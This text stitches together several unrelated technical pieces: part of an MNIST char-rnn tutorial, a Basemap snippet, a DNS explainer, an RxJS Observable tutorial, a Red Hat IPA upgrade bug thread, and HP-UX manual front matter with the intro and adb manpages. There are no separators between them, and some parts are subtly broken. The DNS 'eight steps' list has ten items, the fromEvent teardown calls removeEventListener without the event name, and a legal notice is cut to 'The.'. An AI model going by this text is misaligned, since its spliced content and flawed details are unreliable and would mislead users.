[0000001111111000111111111000]
[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000000000000000000000000]]
At first glance, I have no idea what this is supposed to even be. A coiled snake?
The array is:
[0 0 1 0 0 0 0 0 0 0] ... so it's a 2. Knowing this, I can see that it's probably a badly scanned 2, where the bottom is merely chopped off.
Anyway, looks like our cleaning method worked, Next, let's clean the one-hot array:
print(str(label).replace(' ',''))
Now, for a 7, this is
[0000000100]
Okay, fairly clean. Let's create a training file now. I think the one-hot array distinction is enough for the generative model to separate numbers. The order of the label and image data will depend on the task we're attempting. If we're attempting to do classification, then we'd want the image data first, then the label in the training data. If we wanted a generative model to take a number, 0-9, and draw that number for us, then we'd want the label array first.
I plan to do both, and I am equally curious about both, but let's try classification first, so let's put the image first, array last.
Let's also assume we were going to make this into a production-like model, we'd need some logic to know when the prediction was done, so I am thinking about using maybe a double colon to differentiate it. It may be the case that the length of the array is enough, I really have no idea. This is all guessing. So the model will be fed the image data, then we'll have it generate 16 or more characters to see the prediction.
So each training sample can be written out like:
classify_data = "{}\n::{}::\n\n".format(str_img, str_label)
Where it's first the image data, then a new line, then, encased in double colons, the label, then two new lines to separate sample sets.
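Going the other way, at inference time we would need to pull the label back out of the generated text. Here is a tiny sketch of that (parse_sample is a hypothetical helper, not part of the scripts in this post), relying on the double-colon delimiter:

```python
def parse_sample(sample):
    # Split one "classify" sample back into its image text and label text.
    # Assumes the format built above: image, newline, ::label::, two newlines.
    img_part, rest = sample.split("\n::", 1)
    label_part = rest.split("::", 1)[0]
    return img_part, label_part

img, label = parse_sample("IMGDATA\n::[0000000100]::\n\n")
print(label)  # -> [0000000100]
```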
We aren't going to do it yet, but to make the training set to generate a number based on input, we'd probably do:
gen_to_data = "::{}::\n{}\n\n".format(str_label, str_img)
Now, the full script up to this point is something like:
File name/location:
char-rnn-tensorflow-master/data/mnist/mnist-data-creation.py

from tensorflow.examples.tutorials.mnist import input_data
import matplotlib.pyplot as plt
import numpy as np

mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
batch_xs, batch_ys = mnist.train.next_batch(10000)

with open('classify/input.txt','a') as f:
    for i, data in enumerate(batch_xs):
        data = np.rint(batch_xs[i]).astype(int)
        label = np.rint(batch_ys[i]).astype(int)
        pixels = data.reshape((28,28))
        str_label = str(label).replace(' ','')
        str_img = str(pixels).replace(' ','')
        #gen_to_data = "::{}::\n{}\n\n".format(str_label, str_img)
        classify_data = "{}\n::{}::\n\n".format(str_img, str_label)
        #plt.imshow(pixels, cmap='gray')
        #plt.show()
        f.write(classify_data)
Note: I changed the batch size to be 10,000, so we'll have 10K samples of data. I have no idea if this is a worthy size of data or not.
Run this, and you should get the input.txt file. Open it to make sure it looks something like:
If you're not using sublime text, don't mind the right-hand side there, that just shows a zoomed-out view of the entire file.
Alright, this all looks good to me, let's train! If possible, we'd probably like the sequence to be quite large.
python train.py --data_dir=data/mnist/classify --rnn_size=128 --num_layers=3 --batch_size=28 --seq_length=750
I think sequence length is definitely the most important thing here, so I am first trying the above to see if it will fit in my GPU. I lowered back down to 128 nodes per layer, but still trying 3 layers. I think we could probably go with a smaller sequence, such as 250, since that'd still be a sliding window of about a third of the image anyway; it should still be totally possible to classify like this, but we'd be far more dependent on the generative model to do more than just be able to classify, it'd need to also be able to generate numbers by guessing the number the whole time. I think it'd be more likely to go wrong, but, then again, I really don't know. Too large and it might draw numbers based on the previous numbers. Did I mention this is all a test?
The above does fit, but it's REALLY dreadfully slow. I am going to bump down to 250, and maybe try out a longer sequence some time when I have over-night to train. I am going to re-try with:
python train.py --data_dir=data/mnist/classify --rnn_size=128 --num_layers=3 --batch_size=50 --seq_length=250
That's quite a bit faster, I think I will go with that for now. Okay, I am going to eat something. See you in the next part!
Note: during the filming of this part, I decided to try a different method for the classification part, which saw a slight improvement over the above method. Here's the difference:
from tensorflow.examples.tutorials.mnist import input_data
import matplotlib.pyplot as plt
import numpy as np

mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# mnist.train .test .validate
batch_xs, batch_ys = mnist.train.next_batch(10)

with open("classify/input.txt","a") as f:
    for i, data in enumerate(batch_xs):
        data = np.rint(batch_xs[i]).astype(int)
        label = np.rint(batch_ys[i]).astype(int)
        pixels = data.reshape((28,28))
        index_value = np.argmax(label)
        new_label = np.array(100*[index_value]).reshape((10,10))
        str_img = str(pixels).replace(" ","")
        str_label = str(new_label).replace(" ","")
        classify_data = "{}\n:{}:\n\n".format(str_img, str_label)
        f.write(classify_data)
Basically, the label, rather than being one row and one-hot, is instead just a series of the number we want, in repetition. My line of thinking there is that the model will have more than just one shot to get things right, and it will be easier to learn in training.
Now that you are pretty much a pro at all other things Matplotlib, it is time to learn how to spread your wings a bit and begin working with geo-plotting on maps, using basemap. Basemap works alongside Matplotlib to allow you to plot via latitude and longitude coordinates.
Once you have basemap installed, you can use the following code to quickly show a simple map. This will just render and display a map, but soon we'll be plotting, zooming, and more fun things!
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt

m = Basemap(projection='mill',llcrnrlat=-90,urcrnrlat=90,\
            llcrnrlon=-180,urcrnrlon=180,resolution='c')

m.drawcoastlines()
m.fillcontinents()
m.drawmapboundary()

plt.title("Quick Basemap Example!")
plt.show()
What is DNS?
The Domain Name System (DNS) is the phonebook of the Internet. Humans access information online through domain names, like nytimes.com or espn.com. Web browsers interact through Internet Protocol (IP) addresses. DNS translates domain names to IP addresses so browsers can load Internet resources. When a user wants to load a webpage, a translation must occur between what a user types into their web browser (example.com) and the machine-friendly address necessary to locate the example.com webpage.
There are 4 DNS servers involved in loading a webpage:
- DNS recursor - The recursor can be thought of as a librarian who is asked to go find a particular book somewhere in a library. The DNS recursor is a server designed to receive queries from client machines through applications such as web browsers. Typically the recursor is then responsible for making additional requests in order to satisfy the client’s DNS query.
- Root nameserver - The root server is the first step in translating (resolving) human readable host names into IP addresses. It can be thought of like an index in a library that points to different racks of books - typically it serves as a reference to other more specific locations.
- TLD nameserver - The top level domain server (TLD) can be thought of as a specific rack of books in a library. This nameserver is the next step in the search for a specific IP address, and it hosts the last portion of a hostname (In example.com, the TLD server is “com”).
- Authoritative nameserver - This final nameserver can be thought of as a dictionary on a rack of books, in which a specific name can be translated into its definition.
What's the difference between an authoritative DNS server and a recursive DNS resolver?
Recursive DNS resolver

The recursive resolver is the computer that responds to a recursive request from a client and takes the time to track down the DNS record. It does this by making a series of requests until it reaches the authoritative DNS nameserver for the requested record (or times out or returns an error if no record is found).
Authoritative DNS server
Put simply, an authoritative DNS server is a server that actually holds, and is responsible for, DNS resource records. This is the server at the bottom of the DNS lookup chain that will respond with the queried resource record.
What are the steps in a DNS lookup?
The 8 steps in a DNS lookup:

- A user types 'example.com' into a web browser and the query travels into the Internet, where it is received by a DNS recursive resolver.
- The resolver then queries a DNS root nameserver (.).
- The root server then responds to the resolver with the address of a Top Level Domain (TLD) DNS server (such as .com or .net), which stores the information for its domains. When searching for example.com, our request is pointed toward the .com TLD.
- The resolver then makes a request to the .com TLD.
- The TLD server then responds with the IP address of the domain's nameserver, example.com.
- Lastly, the recursive resolver sends a query to the domain's nameserver.
- The IP address for example.com is then returned to the resolver from the nameserver.
- The DNS resolver then responds to the web browser with the IP address of the domain requested initially.
- The browser makes a HTTP request to the IP address.
- The server at that IP returns the webpage to be rendered in the browser.
Once the 8 steps of the DNS lookup have returned the IP address for example.com, the browser is able to make the request for the web page.
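The referral chain in steps 2 through 7 can be sketched as a toy resolver. All of the table names and server labels below are made up for illustration; real resolvers speak the DNS wire protocol to real servers:

```python
# Each dict stands in for one nameserver's answers.
ROOT_REFERRALS = {"com": "tld-com-server"}        # root -> TLD server
TLD_REFERRALS = {"example.com": "auth-server"}    # TLD -> authoritative server
AUTH_RECORDS = {"example.com": "93.184.216.34"}   # authoritative -> A record

def resolve(hostname):
    # Follow root -> TLD -> authoritative referrals to find an IP.
    tld = hostname.rsplit(".", 1)[-1]
    if tld not in ROOT_REFERRALS:
        raise LookupError("root has no referral for ." + tld)
    if hostname not in TLD_REFERRALS:
        raise LookupError("TLD has no referral for " + hostname)
    if hostname not in AUTH_RECORDS:
        raise LookupError("no A record for " + hostname)
    return AUTH_RECORDS[hostname]

print(resolve("example.com"))  # -> 93.184.216.34
```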
What are the types of DNS Queries?
3 types of DNS queries:
- Recursive query - In a recursive query, a DNS client requires that a DNS server (typically a DNS recursive resolver) will respond to the client with either the requested resource record or an error message if the resolver can't find the record.
- Iterative query - in this situation the DNS client will allow a DNS server to return the best answer it can. If the queried DNS server does not have a match for the query name, it will return a referral to a DNS server authoritative for a lower level of the domain namespace. The DNS client will then make a query to the referral address. This process continues with additional DNS servers down the query chain until either an error or timeout occurs.
- Non-recursive query - typically this will occur when a DNS resolver client queries a DNS server for a record that it has access to either because it is authoritative for the record or the record exists inside of its cache. A DNS server typically caches DNS records to prevent additional bandwidth consumption and load on upstream servers.
What is DNS caching? Where does DNS caching occur?
Browser DNS caching.
Operating system (OS) level DNS caching:
- If the resolver does not have the A records, but does have the NS records for the authoritative nameservers, it will query those name servers directly, bypassing several steps in the DNS query. This shortcut prevents lookups from the root and .com nameservers (in our search for example.com) and helps the resolution of the DNS query occur more quickly.
- If the resolver does not have the NS records, it will send a query to the TLD servers (.com in our case), skipping the root server.
- In the unlikely event that the resolver does not have records pointing to the TLD servers, it will then query the root servers. This event typically occurs after a DNS cache has been purged.
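To make the caching idea concrete, here is a toy TTL cache in Python. The class and method names are invented for illustration; real resolver caches are far more involved, but the core behavior is the same: a record is served from the cache until its time-to-live elapses, after which it must be re-resolved:

```python
import time

class DNSCache:
    # Maps hostname -> (ip, expiry time); entries die when their TTL runs out.
    def __init__(self):
        self._store = {}

    def put(self, hostname, ip, ttl, now=None):
        now = time.time() if now is None else now
        self._store[hostname] = (ip, now + ttl)

    def get(self, hostname, now=None):
        now = time.time() if now is None else now
        entry = self._store.get(hostname)
        if entry is None:
            return None              # miss: a real resolver would query upstream
        ip, expires_at = entry
        if now >= expires_at:
            del self._store[hostname]
            return None              # expired: the record must be re-resolved
        return ip

cache = DNSCache()
cache.put("example.com", "93.184.216.34", ttl=300, now=0)
print(cache.get("example.com", now=10))   # -> 93.184.216.34 (still fresh)
print(cache.get("example.com", now=400))  # -> None (TTL elapsed)
```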
In this article, you will learn how to implement custom observables via the Observable.create method. Furthermore, you will also learn why Observables are lazy. Finally, you will re-create RxJS's fromEvent and of methods to understand the library a bit more.
RxJS is the Library for doing Reactive Functional Programming in JavaScript. It combines Observer pattern with Iterator pattern and also adds Array’s extras like map, filter, reduce and other similar methods on top of it. The most important thing is that you can do functional programming with Asynchronous events with RxJS.
Think of RxJS as Lodash for events. — RxJS Docs
Following are some important terms that you should know before you advance to the coding part.
Observable: It’s basically a collection of events.
Observer: Collection of callbacks, which listens to the value emitted by Observable.
Subscription: It basically represents the invocation of Observable. You can unsubscribe to Observable via Subscription.
On API level, Observable is an Object with subscribe method on it. This subscribe method takes the observer as an argument.
{ subscribe(observer); }
This observer object has three methods: next, error, complete.
To emit a value, you can call the observer.next method with the value that you want to emit.
In case there is an error, you can emit that error via observer.error.
Finally, if everything is finished. You can call the observer.complete method to complete the observable.
Following is an example of an Observer.
{ next: x => console.log(x), error: e => console.log(e), complete: () => console.log('complete') }
You can wrap this pattern around any Push API of the Browser.
Let’s consider the example of setInterval.
Take a look at following snippet.
const timeId = setInterval(() => {
  console.log('setInterval');
}, 1000);

// Stopping the Interval
clearInterval(timeId);
You called setInterval with an anonymous function. setInterval will run this function every one second. It also returns a timeId for referencing this interval further. To stop the execution at any point, you have to call clearInterval with the timeId as shown above.
Now, let’s wrap it around Observable as follows:
function setIntervalObservable(time) {
  return {
    subscribe: (observer) => {
      const timeId = setInterval(() => {
        console.log('setInterval');
      }, time);

      // Teardown logic here
      return {
        unsubscribe: () => {
          clearInterval(timeId);
        }
      };
    }
  };
}
Let’s understand this whole bunch of code clearly. The setIntervalObservable function takes time as input and returns an Observable. This Observable has subscribe method which takes observer as input. When you subscribe to that Observable, it fires the setInterval. This subscribe method also returns an object with the unsubscribe method to stop the interval.
You can use this Observable like this:
const interval$ = setIntervalObservable(1000);

const subscription = interval$.subscribe({
  next: () => console.log('interval')
});

// Stopping the Interval at some point
subscription.unsubscribe();
Take a look at working demo at JSBin.
Take a closer look at the following code:
const interval$ = setIntervalObservable(1000);
Now, you have created an Observable. But it is not going to do anything until you call the subscribe method, because the actual work is done inside the subscribe method in the Observable's implementation. That's why Observables are lazy.
Observable is an Object with subscribe method on it.
The Real implementation in RxJS is a bit more complex. But in order to use your custom Observable with RxJS’s other methods, you need to use RxJS’s Observable.create method for creating your custom Observables.
This Observable.create method takes subscribe function and returns an Observable.
Observable.create(subscribe): Observable<any>;
This subscribe function is like a blueprint of the Observable where you would define the Observable. It takes observer object as an argument. Now, let’s create our setInterval Observable with create method.
const Observable = Rx.Observable;
// or for es6 import:
// import { Observable } from 'rxjs';

function setIntervalObservable(time) {
  return Observable.create((observer) => {
    const timeId = setInterval(() => {
      console.log('setInterval');
    }, time);

    // Teardown logic here
    return () => {
      clearInterval(timeId);
    };
  });
}

const interval$ = setIntervalObservable(1000)
  .subscribe(() => console.log('interval'));

// To unsubscribe from the Observable, uncomment this:
// interval$.unsubscribe();
If you compare this code with the one without the create method, the major difference is that you have to pass a subscribe function to the create method. Also, you have to return a function inside the subscribe method instead of an object with an unsubscribe method. This is all handled by RxJS for us.
Take a look at working demo at JSBin.
In this section, you are going to implement a very basic version of RxJS’s fromEvent and of method. The idea is to give more insight about how these methods work and how you can create custom observables according to your own requirements. It’s highly likely that the actual implementation is more complex.
A fromEvent method in RxJS library has the following signature:
fromEvent(target:EventTargetLike, eventName:string) :Observable<T>;
Creates an Observable that emits events of a specific type coming from the given event target. – RxJS Docs.
So basically, with this method, you can listen to events on a specific DOM Node in Observable way. For example:
import { fromEvent } from 'rxjs';

fromEvent(document.querySelector('#myButton'), 'click');
The above code creates an Observable which listens to the click event on the HTML element with the myButton id.
Let’s implement it ourselves. import { Observable } from 'rxjs'; function fromEvent(dom, event) { return Observable.create((observer) => { const handler = (event) => { observer.next(event); }; dom.addEventListener(event, handler); return () => { dom.removeEventListener(handler); } }); }
It’s fairly simple, in the subscribe function, where you created a handler function which passes the values to the subscriber via object.next. This handler is attached as an event listener for that specific DOM node and event. In the unsubscribe method, you are removing the event listener to clean up.
Take a look at JSBin Demo.
The of method has the following signature:
of(value):Observable<T>;
Creates an Observable that emits some values you specified as arguments, immediately one after the other, and then emits a complete notification - RxJS Docs
Basically, it emits all the values that you have specified in arguments one by one and then completes. For example:
import { of } from 'rxjs';

of(1,2,3);
The above code creates an Observable which will emit 1,2,3 and then completes.
import { Observable } from 'rxjs';

function of(...values) {
  return Observable.create((observer) => {
    const handler = () => {
      values.forEach(val => {
        observer.next(val);
      });
      observer.complete();
    };

    handler();
  });
}
Inside the subscribe function, you created a handler function which iterates with forEach over all the inputs of the of method and fires observer.next with each input. Then it fires observer.complete() and finishes. Finally, we call the handler function.
Take a look at JSBin Demo.
In this post, you have learned how to create Observable via create method. Along with that, you have learned why Observables are lazy. In the end, you also did a case study on RxJS’s fromEvent and of method.
Upgrading the ipa packages fails if the required openssl version is not installed
When the user attempts to upgrade the *ipa* packages, Identity Management (IdM) does not automatically install the required version of the *openssl* packages. Consequently, if the 1.0.1e-42 version of *openssl* is not installed before the user runs the "yum update ipa*" command, the upgrade fails during the DNSKeySync service configuration.
To work around this problem, update *openssl* manually to version 1.0.1e-42 or later before updating *ipa*. This prevents the upgrade failure.
Description of problem:
IPA server upgrade fails from RHEL 7.0 to RHEL 7.2 using "yum update ipa* sssd"
Version-Release number of selected component (if applicable):
ipa-server-4.2.0-15.el7_2.3.x86_64
How reproducible: Always
Steps to Reproduce:
1. Setup RHEL7.0 host with IPA master
2. Add RHEL 7.2 and RHEL 7.2 update repos on the system.
3. run yum update ipa* sssd
4. Verify the logs for yum update process along with ipaupgrade process.
# tail -f /var/log/messages
# tail -f /var/log/ipaupgrade.log
# tail -f /var/log/yum.log
Actual results:
1. After step 4, the following error message is displayed during the yum update process:
Expected results:
ipa-server upgrade should be successful without any errors.
Additional info:
1. When the server is upgraded using "yum update" command, no error messages are observed and the server is upgraded successfully.
2. Also openssl is upgraded to latest version.(openssl-1.0.1e-42.el7_1.9.x86_64)
Created attachment 1100487 [details]
Workaround patch
Workaround: update openssl package first to version at least 1.0.1e-42. Then update ipa package.
(In reply to Martin Bašti from comment #2)
> Created attachment 1100487 [details]
> Workaround patch
Please just note that "Requires(pre)" does not supersede "Requires". You can for example delete such package after upgrade. So it may make sense to keep both Requires in the spec file.
Okay, so we may want to add Requires to softhsm.spec and Requires(pre) to ipa.spec. Is it a reasonable idea? Should I open a bug against softhsm?
Created attachment 1111451 [details]
Workaround patch update 1
Comment on attachment 1111451 [details]
Workaround patch update 1
Looks good, but we can stick with the old version if bug 1293340 is solved at the same time.
The patch has been acked
IPA server version: ipa-server-4.4.0-7.el7.x86_64
Tested the bug on the basis of following steps:
1. Tested that IPA server configured on RHEL 7.0 is upgraded from 7.0 to 7.3.
2. Noticed that ipaupgrade.log file is created at /var/log/ipaupgrade.log.
3. Noticed that var/log/ipaupgrade.log file is not updated.
See below:
[root@vm-idm-011 log]# rpm -q ipa-server
ipa-server-4.4.0-7.el7.x86_64
[root@vm-idm-011 log]# ls -al ipaupgrade.log
-rw-r--r--. 1 root root 0 Aug 10 17:59 ipaupgrade.log
[root@vm-idm-011 log]# cat ipaupgrade.log
[root@vm-idm-011 log]#
Thus on the basis of above observations, marking the status of bug to "ASSIGNED".
Can you provide more info?
Any output from yum upgrade?
Can you re-run ipa-server-upgrade?
Hi Martin,
Please find the details as below:
[root@vm-idm-011 log]# cat yum.log | grep ipa-server
Aug 10 13:25:33 Installed: ipa-tests-ipa-server-rhel70-shared-sgoveas.20150107141511-0.noarch
Aug 10 13:26:21 Installed: ipa-tests-ipa-server-rhel70-quickinstall-spoore.20140812195047-0.noarch
Aug 10 13:28:29 Installed: ipa-server-3.3.3-28.el7.x86_64
Aug 10 17:59:03 Installed: ipa-server-common-4.4.0-7.el7.noarch
Aug 10 17:59:05 Installed: ipa-server-4.4.0-7.el7.x86_64
Aug 10 17:59:06 Installed: ipa-server-dns-4.4.0-7.el7.noarch
On running ipa-server-upgrade I notice following:
[root@vm-idm-011 ~]# ipa-server-upgrade
  File "/usr/lib/python2.7/site-packages/pki/client.py", line 28, in <module>
from requests.packages.urllib3.exceptions import InsecureRequestWarning
ImportError: No module named packages.urllib3.exceptions
Let me know if you need access to the machine.
This is a dogtag issue
File "/usr/lib/python2.7/site-packages/pki/client.py", line 28, in <module>
from requests.packages.urllib3.exceptions import InsecureRequestWarning
ImportError: No module named packages.urllib3.exceptions
There are already several bugs for that.
here:
I don't know how to handle this, but we cannot fix it on IPA side :)
If this is fixed with pki-core-10.3.3-5.el7, you can simply bump Requires in ipa and move this bug to ON_QA. No?
I don't know if it was fixed, bz1364071 is still ON_QA
The issue will be fixed in bug 1364071 and bug 1365572. Temporary workaround: update python-requests to version >= 2.6.0
Both bug 1364071 and bug 1365572 are on QA, which should fix the issue in comment 17.
Volume 1 of 9
Printed in USA
Legal Notices
The.
Use of this document and any supporting software media is restricted to
this product only. Additional copies of the programs may be made for
security and back-up purposes only. Resale of the programs, in their
present form or with alterations, is expressly prohibited.
Warranty
A copy of the specific warranty terms applicable to your Hewlett-Packard
product and replacement parts can be obtained from your local Sales and
Service Office.
Reproduction, adaptation, or translation of this document without prior
written permission is prohibited, except as allowed under the copyright
laws.
This document and the software it describes may also be protected under
one or more of the following copyrights. Additional copyrights are
acknowledged in some individual manpages.
of California.
Trademark Notices
Intel and Itanium are registered trademarks of Intel Corporation in
the US and other countries and are used under license.
Java is a US trademark of Sun Microsystems, Inc.
Microsoft and MS-DOS are U.S. registered trademarks of Microsoft
Corporation.
OSF/Motif is a trademark of The Open Group in the US and other
countries.
UNIX is a registered trademark of The Open Group.
X Window System is a trademark of The Open Group.
Revision History
This document’s printing date and part number indicate its edition. The
printing date changes when a new edition is printed. (Minor corrections
and updates which are incorporated at reprint do not cause the date to
change.) New editions of this manual incorporate all material updated
since the previous edition.
Part Number Date, Release, Format, Distribution
B2355-60103 August 2003. HP-UX release 11i version 2, one volume
HTML, docs.hp.com and Instant Information.
B2355-90779-87 August 2003. HP-UX release 11i version 2, nine
volumes PDF, docs.hp.com and print.
B9106-90010 June 2002. HP-UX release 11i version 1.6, one volume
HTML, docs.hp.com and Instant Information.
B9106-90007 June 2001. HP-UX release 11i version 1.5, seven
volumes HTML, docs.hp.com and Instant Information.
B2355-90688 December 2000. HP-UX release 11i version 1, nine
volumes.
B2355-90166 October 1997. HP-UX release 11.0, five volumes.
B2355-90128 July 1996. HP-UX release 10.20, five volumes, online
only.
B2355-90052 July 1995. HP-UX release 10.0, four volumes.
Conventions
We use the following typographical conventions.
audit (5) An HP-UX manpage. audit is the name and 5 is the
section in the HP-UX Reference. On the web and on the
Instant Information CD, it may be a hot link to the
manpage itself. From the HP-UX command line, you
can enter “man audit” or “man 5 audit” to view the
manpage. See man (1).
Book Title The title of a book. On the web and on the Instant
Information CD, it may be a hot link to the book itself.
KeyCap The name of a keyboard key. Note that Return and Enter
both refer to the same key.
Emphasis Text that is emphasized.
Emphasis Text that is strongly emphasized.
ENVIRONVAR The name of an environment variable.
[ERRORNAME] The name of an error number, usually returned in the
errno variable.
Term The defined use of an important word or phrase.
ComputerOutput Text displayed by the computer.
UserInput Commands and other text that you type.
Command A command name or qualified command phrase.
Variable The name of a variable that you may replace in a
command or function or information in a display that
represents several possible values.
[ ] The contents are optional in formats and command
descriptions. If the contents are a list separated by |,
you may choose one of the items.
{ } The contents are required in formats and command
descriptions. If the contents are a list separated by |,
you must choose one of the items.
... The preceding element may be repeated an arbitrary
number of times.
| Separates items in a list of choices.
Preface
HP-UX is the Hewlett-Packard Company’s implementation of an
operating system that is compatible with various industry standards. It
is based on the UNIX System V Release 4 operating system and
includes important features from the Fourth Berkeley Software
Distribution.
The nine volumes of this manual contain the system reference
documentation, made up of individual entries called manpages, named
for the man command that displays them on the system. The entries are
also known as manual pages or reference pages.
General For a general introduction to HP-UX and the structure and format of the
Introduction manpages, please see the introduction (9) manpage in volume 9.
Section The manpages are divided into sections that also have introduction
Introductions (intro) manpages that describe the contents. These are:
intro (1) Section 1: User Commands
(A-M in volume 1; N-Z in volume 2)
intro (1M) Section 1M: System Administration Commands
(A-M in volume 3; N-Z in volume 4)
intro (2) Section 2: System Calls
(in volume 5)
intro (3C) Section 3: Library Functions
(A-M in volume 6; N-Z in volume 7)
intro (4) Section 4: File Formats
(in volume 8)
intro (5) Section 5: Miscellaneous Topics
(in volume 9)
intro (7) Section 7: Device (Special) Files
(in volume 9)
intro (9) Section 9: General Information
(in volume 9)
Volume One
Table of Contents
Section 1
Table of Contents: Volumes One and Two
Section 1, Part 1: User Commands, A-M
intro(1)
NAME
intro - introduction to command utilities and application programs
DESCRIPTION
This section describes commands accessible by users, as opposed to system calls in Section (2) or library
routines in Section (3), which are accessible by user programs.
Command Syntax
Unless otherwise noted, commands described in this section accept options and other arguments accord-
ing to the following syntax:
name [ option ( s ) ] [ cmd_arg ( s ) ]
where the elements are defined as follows:
name Name of an executable file.
option One or more option s can appear on a command line. Each takes one of the following
forms:
-no_arg_letter
A single letter representing an option without an argument.
-no_arg_letters
Two or more single-letter options combined into a single command-line argu-
ment.
-arg_letter <>opt_arg
A single-letter option followed by a required argument where:
arg_letter
is the single letter representing an option that requires an argu-
ment,
opt_arg
is an argument (character string) satisfying the preceding
arg_letter ,
<> represents optional white space.
cmd_arg Path name (or other command argument) not beginning with -, or - by itself indicating
the standard input. If two or more cmd_arg s appear, they must be separated by white
space.
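The option syntax above is what getopt-style parsers implement; as an illustrative aside (not part of the manpage), Python's getopt module accepts the same conventions:

```python
import getopt

# "-ab" is two single-letter options combined into one argument; "-o out"
# is an option with a required argument; "file" is a cmd_arg. The option
# string "abo:" declares -a and -b as argument-less and -o as requiring
# an argument.
opts, args = getopt.getopt(["-ab", "-o", "out", "file"], "abo:")
print(opts)   # parsed option/argument pairs
print(args)   # remaining cmd_args
```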
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−1
RETURN VALUE
Upon termination, each command returns two bytes of status, one supplied by the system giving the
cause for termination, and (in the case of ‘‘normal’’ termination) one supplied by the program. These bytes
are variously called ‘‘exit code’’, ‘‘exit status’’, ‘‘return code’’, or ‘‘return value’’, and are described only where
special conventions are involved.
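The two status bytes described above follow the classic wait(2) encoding; as an illustrative aside on a POSIX system (Python here, not part of the manpage):

```python
import os

# os.system() returns the raw wait(2) status on POSIX: the low byte encodes
# the terminating signal (0 for normal exit) and the next byte carries the
# program-supplied exit code.
status = os.system("exit 3")
print(os.WIFEXITED(status))    # normal termination?
print(os.WEXITSTATUS(status))  # the program-supplied byte
```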
WARNINGS
Some commands produce unexpected results when processing files containing null characters. These
commands often treat text input lines as strings, and therefore become confused when they encounter a
null character (the string terminator) within a line.
SEE ALSO
getopt(1), exit(2), wait(2), getopt(3C), hier(5), introduction(9).
Web access to HP-UX documentation at.
adb(1)
NAME
adb - absolute debugger
SYNOPSIS
adb [-h]
adb [-n|-o] [-w] [-I path] kernelfile memfile
adb [-n|-o] [-w] [-I path] kernelfile crashdir
adb [-n|-o] [-w] [-I path] crashdir
adb [-n|-o] [-w] [-I path] [objfile] [corefile]
adb [-n|-o] [-w] [-I path] -P pid [execfile]
DESCRIPTION
The adb command executes a general-purpose debugging program that is sensitive to the underlying
architecture of the processor and operating system on which it is run. It can be used to examine files and
provide a controlled environment for executing HP-UX programs.
adb inspects exactly one object file, referred to as the current object file, and one memory file, referred
to as the current memory file. Either of these files can be the NULL file, specified by the - argument,
which is a file with no contents. The object file and the memory file are specified using the following
arguments:
kernelfile An HP-UX kernel, usually vmunix.
memfile /dev/mem or /dev/kmem. memfile is assumed to be on an HP-UX system running
kernelfile if kernelfile is specified. /dev/mem is supported only on PA-RISC platforms.
crashdir A directory containing an HP-UX system crash dump, which is assumed to be produced from
kernelfile if kernelfile is specified.
objfile Normally an executable program file. It can also be a relocatable object file, shared library
file or a DLKM module. The default for objfile is a.out.
corefile A core image file produced after executing objfile . The default for corefile is core.
execfile The executable file corresponding to pid , the process ID of the process to be adopted for
debugging by adb.
The current object file may be any one of kernelfile , the vmunix file in crashdir , objfile , or execfile . The
current object file preferably should contain a symbol table; if it does not, the symbolic features of adb
cannot be used, although the file can still be examined. The current memory file may be any one of
memfile , the system memory dump in crashdir , corefile , or the memory of process pid .
Requests to adb are read from standard input and adb responds on standard output. If the -w flag is
present, objfile is created (if necessary) and opened for reading and writing, to be modified using adb.
adb ignores QUIT; INTERRUPT causes return to the next adb command.
There are two modes of operation for adb: backward compatibility mode and normal mode. Backward
compatibility mode is the default on PA-RISC systems. Normal mode is the default on Itanium systems.
On startup adb executes adb commands from the file $HOME/.adbrc.
To debug a MxN process or the core, adb requires the MxN debug library, libmxndbg. Depending on
the application type, it loads /usr/lib/libmxndbg.sl (for 32 bit PA-RISC systems) or
/usr/lib/libmxndbg64.sl (for 64 bit PA-RISC systems) or /usr/lib/hpux32/libmxndbg.so
(for Itanium(R)-based systems). If the relevant library is not found in the specified path, you should set
the shell variable ADB_PATHMXNDBG to the path where the correct library can be found.
Options
adb recognizes the following command-line options , which can appear in any order but must appear
before any file arguments:
-h Print a usage summary and exit. If this option is used, all other options and arguments are
ignored.
-i Ignores $HOME/.adbrc.
-I path path specifies a list of directories where files read with < or << (see below) are sought. This
list has the same syntax as, and similar semantics to, the PATH shell variable; the default is
.:/usr/lib/adb.
-n Specify the normal mode. This is the default on Itanium systems. This option is mutually
exclusive with the -o option. The last one specified takes effect.
-o Specify backward compatibility mode. This is the default on PA-RISC systems. This option is
mutually exclusive with the -n option. The last one specified takes effect.
-P pid Adopt process with process ID pid as a ‘‘traced’’ process; see ttrace (2). This option is helpful
for debugging processes that were not originally run under the control of adb.
-w This option must be specified to enable the file write commands of adb. Objfile is opened for
reading and writing. It also enables writes to memfile if it is a kernel memory file.
The following command-line options to adb are obsolete and are no longer required. (If used they gen-
erate a warning.)
-k Previously adb required this option to recognize HP-UX crash dumps or /dev/mem.
-m Previously adb required this option to recognize multiple file HP-UX crash dumps.
Requests to adb follow either the traditional form:
[address ] [ ,count ] [command-char ] [command-arguments] [;]
or the new form:
keyword [command-arguments] [;]
Only the traditional form is available in backward compatibility mode.
If address is present, dot is set to address . dot is the adb state variable which keeps track of the
current address. dotincr is another state variable which keeps track of increments to dot as adb
steps through a format string; see Format String below. Initially dot and dotincr are set to 0. For
most commands, count specifies the number of times the command is to be executed. The default count is
1. address and count are expressions.
The interpretation of an address depends on the context in which it is used. If a subprocess is being
debugged, addresses are interpreted in the address space of the subprocess. (For further details see
Address Mapping below.)
The command-char and command-arguments specify the command to run. See Commands below.
Expressions
All adb expression primaries are treated as 64-bit unsigned integers and the expression also evaluates to
a 64-bit unsigned integer. The following primaries are supported:
integer A number. The prefixes 0 (zero), 0o and 0O force interpretation in octal radix; the
prefixes 0t, OT, 0d, and 0D force interpretation in decimal radix; the prefixes 0x and
0X force interpretation in hexadecimal radix; the prefixes 0b and 0B force interpretation
in binary radix. Thus 020 = 0d16 = 0x10 = 0b10000 = sixteen. If no prefix
appears, the default radix is used; see the d command. The radix is initialized to hexa-
decimal. Note that a hexadecimal number whose most significant digit would other-
wise be an alphabetic character must have a 0x (or 0X) prefix.
’cccccccc ’ The ASCII value of up to 8 characters. If more than 8 characters are specified, the
value is undefined. A backslash (\) can be used to escape a single quote (’).
